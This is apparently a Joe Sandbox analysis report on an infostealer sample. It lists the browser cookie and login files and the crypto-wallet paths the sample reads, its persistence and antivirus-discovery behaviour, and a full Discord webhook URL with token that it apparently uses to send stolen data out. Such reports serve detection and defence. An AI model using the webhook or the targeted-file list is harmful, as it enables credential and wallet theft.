              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\apDMcnqqWs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\apDMcnqqWs.exe | File written: C:\Windows\System32\drivers\etc\hosts
Source: powershell.exe, 00000012.00000002.2402540104.000002CB31EB4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2531315049.000002CB4C076000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\conhost.exe | WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntiVirusProduct

              Stealing of Sensitive Information

Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Electrum
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: com.liberty.jaxx
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 3C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Exodus
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 1C:\Users\user\AppData\Roaming\Binance\wallets8
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Ethereum
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: 7C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: C:\Users\user\Desktop\apDMcnqqWs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\apDMcnqqWs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\apDMcnqqWs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\apDMcnqqWs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
Source: C:\Users\user\Desktop\apDMcnqqWs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\apDMcnqqWs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
Source: C:\Users\user\Desktop\apDMcnqqWs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: Yara match | File source: apDMcnqqWs.exe, type: SAMPLE
Source: Yara match | File source: 0.0.apDMcnqqWs.exe.1ed082d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2102524227.000001ED082D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2596078793.000001ED0A0F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: apDMcnqqWs.exe PID: 6924, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr, type: DROPPED
MITRE ATT&CK Matrix

Techniques are listed per tactic column. A number in front of a technique is the count of matching signatures shown in the report for that technique.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Windows Management Instrumentation; 1 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; 12 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 12 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 File and Directory Permissions Modification; 21 Disable or Modify Tools; 11 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading; 11 Masquerading; 41 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 22 System Information Discovery; 1 Query Registry; 131 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; 2 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 3 Ingress Tool Transfer; 21 Encrypted Channel; 4 Non-Application Layer Protocol; 5 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (graph image not included; ID: 1572913, Sample: apDMcnqqWs, Startdate: 11/12/2024, Architecture: WINDOWS, Score: 100)

Root node: DNS/IP ip-api.com, discord.com. Signatures: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; 8 other signatures.

apDMcnqqWs.exe (started):
  Network: ip-api.com 208.95.112.1 (ports 49720, 80; TUT-AS, United States); discord.com 162.159.138.232 (ports 443, 49787, 49793; CLOUDFLARENET, United States)
  Dropped: C:\ProgramData\Microsoft\...\4z5ru.scr (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII); C:\Users\user\AppData\...\apDMcnqqWs.exe.log (ASCII); C:\ProgramData\...\4z5ru.scr:Zone.Identifier (ASCII)
  Signatures: Suspicious powershell command line found; Found many strings related to Crypto-Wallets (likely being stolen); Drops PE files with a suspicious file extension; 5 other signatures
  Child processes: powershell.exe (started); powershell.exe (started); WMIC.exe (started); 6 other processes
    powershell.exe (first): signature Loading BitLocker PowerShell Module; children WmiPrvSE.exe (started), conhost.exe (started)
    powershell.exe (second): child conhost.exe (started)
    WMIC.exe: child conhost.exe (started)
    6 other processes: children conhost.exe (started), conhost.exe (started), conhost.exe (started), 2 other processes

Source | Detection | Scanner | Label | Link
apDMcnqqWs.exe | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |
apDMcnqqWs.exe | 79% | Virustotal | | Browse
apDMcnqqWs.exe | 100% | Avira | HEUR/AGEN.1307507 |
apDMcnqqWs.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr | 100% | Avira | HEUR/AGEN.1307507 |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr | 100% | Joe Sandbox ML | |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\4z5ru.scr | 88% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://crl.micft.cMicRosof | 0% | Avira URL Cloud | safe |
http://crl.mic | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.138.232 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://ip-api.com/json/?fields=225545 | false | | high
https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://mail.google.com/mail/?usp=installed_webapp | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mail.google.com/mail/installwebapp?usp=chrome_default | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/presentation/J | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.micom/pkiops/Docs/ry.htm0 | powershell.exe, 00000002.00000002.2197486995.000002017538F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.google.com/document/J | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/drive/installwebapp?usp=chrome_default | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discordapp.com/api/v9/users/ | apDMcnqqWs.exe, 4z5ru.scr.0.dr | false | | high
https://www.youtube.com/: | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://discord.com | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A348000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A322000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mail.google.com/mail/: | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/presentation/installwebapp?usp=chrom | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/document/installwebapp?usp=chrome_default | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/presentation/: | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/presentation/installwebapp?usp=chrome_default | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/document/: | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/spreadsheets/J | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/spreadsheets/?usp=installed_webapp | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://mail.google.com/mail/J | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2189157435.0000020110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2DE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D45E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43C43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43B00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/spreadsheets/: | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/?lfhs=2 | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-api.com | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A27F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/PyDevOG/Divulge-Stealer | 4z5ru.scr.0.dr | false | | high
https://oneget.orgX | powershell.exe, 0000000E.00000002.2301853411.00000215D409F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.micft.cMicRosof | powershell.exe, 00000002.00000002.2197486995.00000201753AF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.youtube.com/s/notifications/manifest/cr_install.html | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A091000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2168075363.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2216206407.000001E38DA98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D2C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB33A91000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.youtube.com/?feature=ytca | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806- | apDMcnqqWs.exe, 4z5ru.scr.0.dr | false | | high
https://www.youtube.com/J | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2189157435.0000020110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2CAE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2368673282.00000215E2DE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D45E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43C43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2514196994.000002CB43B00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 0000000E.00000002.2301853411.00000215D409F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A322000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com/api/v10/users/ | 4z5ru.scr.0.dr | false | | high
https://drive.google.com/: | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000012.00000002.2408109229.000002CB33CC2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000002.00000002.2168075363.0000020100228000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000012.00000002.2408109229.000002CB33CC2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000012.00000002.2408109229.000002CB34C04000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.mic | powershell.exe, 00000002.00000002.2197486995.00000201753AF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000012.00000002.2408109229.000002CB3544E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.google.com/J | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000012.00000002.2408109229.000002CB33CC2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000002.00000002.2168075363.0000020100228000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://docs.google.com/presentation/?usp=installed_webapp | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8Ts | apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A348000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A091000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A322000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2168075363.0000020100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2216206407.000001E38DA5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2216206407.000001E38DA71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2301853411.00000215D2C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2408109229.000002CB33A91000.00000004.00000800.00020000.00000000.sdmp | false
                                                                                                                      high
                                                                                                                      http://ip-api.com/json/?fields=225545PapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A27F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://docs.google.com/document/?usp=installed_webappapDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A435000.00000004.00000800.00020000.00000000.sdmp, apDMcnqqWs.exe, 00000000.00000002.2596078793.000001ED0A44A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://oneget.orgpowershell.exe, 0000000E.00000002.2301853411.00000215D409F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.159.138.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1572913
Start date and time: 2024-12-11 08:38:41 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: apDMcnqqWs.exe (renamed file extension from none to exe, because the original name is a hash value)
Original Sample Name: 1e8d2f6fa4b8d1ec630758422c493de85d367f2eb7c76b452b9843ed2b2a7bff
Detection: MAL
Classification: mal100.adwa.spyw.evad.winEXE@27/22@2/2
EGA Information:
• Successful, ratio: 20%
HCA Information:
• Successful, ratio: 62%
• Number of executed functions: 253
• Number of non-executed functions: 8
• Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 142.250.181.67, 13.107.246.63, 52.149.20.212
• Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 6032 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 612 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6484 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7028 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
02:39:30 | API Interceptor | 1x Sleep call for process: dllhost.exe modified
02:39:33 | API Interceptor | 27x Sleep call for process: powershell.exe modified
02:39:44 | API Interceptor | 291x Sleep call for process: apDMcnqqWs.exe modified
02:39:45 | API Interceptor | 4x Sleep call for process: WMIC.exe modified
Match: 208.95.112.1
Associated Sample Name / URL | Detection | Threat Name | Context
http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe | malicious | Poisonivy | ip-api.com/json/
ORDER-6070Y689_0PF57682456_DECVC789378909740.js | malicious | WSHRat, Snake Keylogger | ip-api.com/json/
New Order Enquiry.js | malicious | AgentTesla | ip-api.com/line/?fields=hosting
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT | ip-api.com/line/?fields=hosting
KrnlSetup.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
Wh2c6sgwRo.exe | malicious | DCRat, PureLog Stealer, zgRAT | ip-api.com/line/?fields=hosting
mu3JuAyrj5.exe | malicious | PureLog Stealer, zgRAT | ip-api.com/json/
interior-design-villa-a23.lnk | malicious | MalLnk | ip-api.com/json/?fields=8195
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | ip-api.com/line/?fields=hosting
run.cmd | malicious | Unknown | ip-api.com/json/?fields=8195
Match: discord.com
Associated Sample Name / URL | Detection | Threat Name | Context
https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exe | malicious | Unknown | 162.159.135.232
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT | 162.159.128.233
file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, Vidar | 162.159.128.233
